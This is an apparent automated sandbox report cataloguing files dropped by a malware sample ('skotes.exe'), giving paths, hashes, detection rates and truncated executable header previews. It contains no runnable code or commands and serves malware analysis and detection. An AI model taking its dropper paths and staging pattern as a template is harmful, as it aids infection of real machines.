Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3180032
Entropy (8bit):	6.613710042493806
Encrypted:	false
SSDEEP:	49152:bulBK0+BLdd1VSQdu3n3alJv1pgOgEKV/xJRMP4ttawjvkVTSDAGY8:K7K0+fdXSQg3n3aTv1pPCAwttjvLDW8
MD5:	2EB7DD5FC174EA7CE691BA15A1E34BA4
SHA1:	4287676ADDCD538C2F5F975B6F2A9E8A415F2B37
SHA-256:	6094E39D84C42971E1EFBA0875FA34052DC3D2CD24F8B884B383AAAF32FE3CEC
SHA-512:	B98CDE63C0678552966025DB56A15CF211D8D79513BD9A928BFEE11909490ABA53CEB1135CF88647196E079430BBD878828091840EBF822251F01F4C776A4E4A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....4g..............................0...........@...........................0......`1...@.................................T@..h............................A...................................................................................... . . ....... ..................@....rsrc .....0.......0..............@....idata .....@.......0..............@...vdmmmaet.0+..P....+..2..............@...wxqjpqnl......0......`0.............@....taggant.0....0.."...d0.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1799168
Entropy (8bit):	7.942172624587254
Encrypted:	false
SSDEEP:	49152:zTlClKXf1sJb2d9Y2Ju9m5bqW8mMAxHU:nlC4NY+bqW1MAl
MD5:	F8D1D73A4B017AE508EE5172F7601906
SHA1:	6FEB8B7FA058B1F818EA2B2485B8435D87B218C6
SHA-256:	4688B875A5EFC11C995747658F96F517BF06631E4AB4A1C05D0718ABDC33E5FE
SHA-512:	1365B7DDA13EDAE170C5022828EDCFD708F5378D8FC83BA07433A2094E7137C1FDF47E18BF387D481AE2610B3CE13EACD8E6E9FCB63B4423F39536C4BD631E7A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................@".......h...........@...........................h...........@.................................M.$.a.............................$..................................................................................... . ..$......b..................@....rsrc ......$......r..............@....idata ......$......r..............@... ..*...$......t..............@...dhewrjwp......N......v..............@...uaqjjwio......h......L..............@....taggant.0....h.."...R..............@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\SystemData\system.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1006034001\mk.exe
File Type:	data
Category:	dropped
Size (bytes):	270
Entropy (8bit):	6.493477159876109
Encrypted:	false
SSDEEP:	6:Qa3XqAlwxlu3GdN5iLUHSMXekPew96ea4M/chkTqLHIpSLM:QUai3GdN5lH/jn96e6kh0qLHIpoM
MD5:	EBD7FC10C6A3F161B22C61E35369EB0D
SHA1:	09329F0A0C2731C55AF851C29C4B79C1BD5ED996
SHA-256:	AA3688BFC2F8ED6DF6E4E1F625EE2EF2C0D382D30D88A3947CAAD7A74CA82660
SHA-512:	4392774248B00514D40A486D1BE247753DC6735F94230EC6CA2DC0B3F52862C390B56EDC833F50A17BF0A9088C8DA91E18CE2E4B7CC382B1B8E93FD9CE49C2A0
Malicious:	false
Preview:	............z..O.......L..>hD..(.^..@........U.U.I.D....f...... ...L.43..w.T...9..&..h...s..:..(g............. ......Z..]X..IN..wiM.{...*.G...MZk0.../.5@..,....K.......Fg.2r{d..5.I.J8x.].IZ.c._...o@.......5....M.\|0..xa....2.J.W......... 4.p..".J..}..%..![..N)

C:\Users\user\AppData\Local\Temp\02813d30-9c68-413e-8e81-36b755a378ac.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	206855
Entropy (8bit):	7.983996634657522
Encrypted:	false
SSDEEP:	3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
MD5:	788DF0376CE061534448AA17288FEA95
SHA1:	C3B9285574587B3D1950EE4A8D64145E93842AEB
SHA-256:	B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
SHA-512:	3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\1006034001\mk.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	9308672
Entropy (8bit):	6.823957267105585
Encrypted:	false
SSDEEP:	98304:Owxu5dEZsuQ3kG3kcE7p2XQ/t9MzfT/ZJ9dQap5XBQ:OwxKENQ3kG3k7H/vMzfP9dQQ
MD5:	B56761AD16C0E1CDD4765A130123DBC2
SHA1:	FC50B4FD56335D85BBAAF2D6F998AAD037428009
SHA-256:	095A2046D9A3AEEEFC290DC43793F58BA6AB884A30D1743D04C9B5423234CCDD
SHA-512:	26C82DA68D7EEF66C15E8AE0663D29C81B00691580718C63CDB05097AE953CBE0E6AC35B654E883DB735808640BC82141DA54C8773AF627A5EAEA70B0ACF77ED
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....4g..........".......D..RI.......D.......@.............................. .......................@............... ................L.......K..I....S...;...O..............0L..Y........................... L.(....................K.(.....K.<....................text...`.D.......D................. ..`.data.........D.......D.............@....bss.........J..........................idata...I....K..J....J.............@....didata.<.....K.......K.............@....edata........L......(K.............@..@.tls....p.....L..........................rdata..m.... L......*K.............@..@.reloc...Y...0L..Z...,K.............@..B.pdata........O.......N.............@..@.rsrc.....;...S...;..~R.............@..@............. ......................@..@

C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3180032
Entropy (8bit):	6.613710042493806
Encrypted:	false
SSDEEP:	49152:bulBK0+BLdd1VSQdu3n3alJv1pgOgEKV/xJRMP4ttawjvkVTSDAGY8:K7K0+fdXSQg3n3aTv1pPCAwttjvLDW8
MD5:	2EB7DD5FC174EA7CE691BA15A1E34BA4
SHA1:	4287676ADDCD538C2F5F975B6F2A9E8A415F2B37
SHA-256:	6094E39D84C42971E1EFBA0875FA34052DC3D2CD24F8B884B383AAAF32FE3CEC
SHA-512:	B98CDE63C0678552966025DB56A15CF211D8D79513BD9A928BFEE11909490ABA53CEB1135CF88647196E079430BBD878828091840EBF822251F01F4C776A4E4A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....4g..............................0...........@...........................0......`1...@.................................T@..h............................A...................................................................................... . . ....... ..................@....rsrc .....0.......0..............@....idata .....@.......0..............@...vdmmmaet.0+..P....+..2..............@...wxqjpqnl......0......`0.............@....taggant.0....0.."...d0.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1799168
Entropy (8bit):	7.942172624587254
Encrypted:	false
SSDEEP:	49152:zTlClKXf1sJb2d9Y2Ju9m5bqW8mMAxHU:nlC4NY+bqW1MAl
MD5:	F8D1D73A4B017AE508EE5172F7601906
SHA1:	6FEB8B7FA058B1F818EA2B2485B8435D87B218C6
SHA-256:	4688B875A5EFC11C995747658F96F517BF06631E4AB4A1C05D0718ABDC33E5FE
SHA-512:	1365B7DDA13EDAE170C5022828EDCFD708F5378D8FC83BA07433A2094E7137C1FDF47E18BF387D481AE2610B3CE13EACD8E6E9FCB63B4423F39536C4BD631E7A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................@".......h...........@...........................h...........@.................................M.$.a.............................$..................................................................................... . ..$......b..................@....rsrc ......$......r..............@....idata ......$......r..............@... ..*...$......t..............@...dhewrjwp......N......v..............@...uaqjjwio......h......L..............@....taggant.0....h.."...R..............@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2811904
Entropy (8bit):	6.48165561953676
Encrypted:	false
SSDEEP:	49152:4g9pZRGteDLtFJ8R1X5EHEDnX2htiTQr:48pZktiLWRMkDXdQr
MD5:	39307DB79B786D76D1B6070FEC77BC0B
SHA1:	54546D19873479CFF3FC1BA00A77C9433612C8D6
SHA-256:	C6051A76F472B570BF9EB2A80FAA638D370E415F0C7904BA4C4C044D673DB69B
SHA-512:	0DA1EEE41B9DD08C85F8809427E30BFF86DA2F811F5BE29D0AEFB951B377408B0A4899B25EFD6D9F24D3C69BE193A8ADC465D18590D6F81A8DF865FC68A75125
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`+.. ...`....@.. ........................+.....jw+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...ckqtwfzn...........:..............@...wmhyjqub. ...@+....................@....taggant.@...`+..".................@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4d8fcdb3-6533-4f53-b8ac-1268bf831d3c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1551016
Entropy (8bit):	7.993258028932054
Encrypted:	true
SSDEEP:	24576:SU1LfaprRmdMU0FtF0fNQdcmttU4gbVcX/vvITyZ8IDrj3/2HgBFvsCf5k/pRHtg:9LfOwKf2fWVtepcHvUyqM/3/2Ab0Cfg8
MD5:	B0EA48314C3867D63BD19AB7021DDBC9
SHA1:	66E53E2341196A518EBD1667483BE82373F3D5EB
SHA-256:	46BE6C61433B6BF554D559EA90B5B19D4CB4D7EE0E49888DC8883B946857E0D1
SHA-512:	E614829E15B411044EC37810F13686850FEA1A261D4A507BFC510C4661B8D367E0C4FDF34134A9809F381D01E920402F6CA4040727E636161383FD719003E75C
Malicious:	false
Preview:	.PNG........IHDR...2...2......?......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM..............................J...........R.(...........i.........Z.......H.......H.............................2...........2...........pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^......IDATh..Z.t\.y.f.fF.b$.....2.%.0`...qR..&.J..4...a+1.p....z ...J....p @h....W..E.b-3...w.<i$.b..........+.S.Ip....\n...7..#........m.......s....3~..D.nn.,.y.Q..@eA5f.7`F.L.e.#3#.nX..D.n...n.U.e.g.\H...>IW.s.s..!.D.r[.K.....-k.r..x...@.(..<O6<n.D..r.TmD.$c.'z..A....../..?@]Y.....2...d....J...+.t=.l.}.!.RH.I..H`..xo..X..)...e.. c..n#..d...p..Bz.....(.$....4E:.L.

C:\Users\user\AppData\Local\Temp\6dad804f-ce41-41e8-9413-1789d64692ad.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
Category:	dropped
Size (bytes):	76321
Entropy (8bit):	7.996057445951542
Encrypted:	true
SSDEEP:	1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
MD5:	D7A1AC56ED4F4D17DD0524C88892C56D
SHA1:	4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
SHA-256:	0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
SHA-512:	31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
Malicious:	false
Preview:	...........m{..(.}...7.\...N.D.w..m..q....%XfL.I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'..."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g..^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D\|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

C:\Users\user\AppData\Local\Temp\865bc100-cc8e-45f6-857b-28036abbaf16.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15lpm4ew.yto.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53n0ov3q.fjh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bb13z04k.uka.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5i1kygy.3ih.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohncdna5.4ub.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oir3yc3y.tid.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3zca4gi.r00.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4pe0sfw.puu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmw3vyec.gt3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rc0fmrcc.dxq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdlo5kek.enk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tphv3dlg.tnx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trdxgkzx.0mk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txedvejc.h14.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujp1ldov.c2k.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
